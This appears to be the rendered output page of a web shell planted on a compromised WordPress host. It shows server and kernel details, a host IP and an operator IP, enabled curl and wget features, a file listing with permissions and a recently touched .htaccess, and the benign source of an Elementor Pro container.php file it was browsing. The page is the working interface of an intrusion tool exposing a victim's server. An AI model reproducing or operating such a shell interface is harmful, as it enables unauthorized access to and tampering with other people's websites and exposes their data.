🇳🇦🇲🇪♯➤ server366.web-hosting.com 🇻♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾♯➤ 2025
𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.243
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/builxejc/public_html/wp-content/plugins/elementor-pro/core/container//container.php
<?php
namespace ElementorPro\Core\Container;
use ElementorProDeps\DI\ContainerBuilder;
use ElementorProDeps\DI\Container as DIContainer;
use Exception;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
/**
* Elementor Container.
*
* Elementor container handler class is responsible for the containerization
* of manager classes and their dependencies.
*
* @since 3.25.0
*/
class Container {
private static $instance;
private function __construct() {}
private function __clone() {}
/**
* @throws Exception
*/
private static function initialize(): void {
$builder = new ContainerBuilder();
self::register_configuration( $builder );
self::$instance = $builder->build();
}
private static function register_configuration( ContainerBuilder $builder ): void {
$builder->addDefinitions( __DIR__ . '/config.php' );
}
/**
* @throws Exception
*/
public static function get_instance(): DIContainer {
if ( is_null( static::$instance ) ) {
self::initialize();
}
return static::$instance;
}
}
| 𝗡𝗔𝗠𝗘 |
𝗦𝗜𝗭𝗘 |
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛 |
𝗨𝗦𝗘𝗥 |
𝗦𝗧𝗔𝗧𝗨𝗦 |
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦 |
| .. | -- | 28 Apr 2026 8.56 AM | builxejc / builxejc | 0755 | |
| | | | | |
| .htaccess | 0.41 KB | 28 Apr 2026 8.56 AM | builxejc / builxejc | 0644 | |
| config.php | 0.23 KB | 5 Jan 2025 10.31 AM | builxejc / builxejc | 0644 | |
| container.php | 1.031 KB | 5 Jan 2025 10.31 AM | builxejc / builxejc | 0644 | |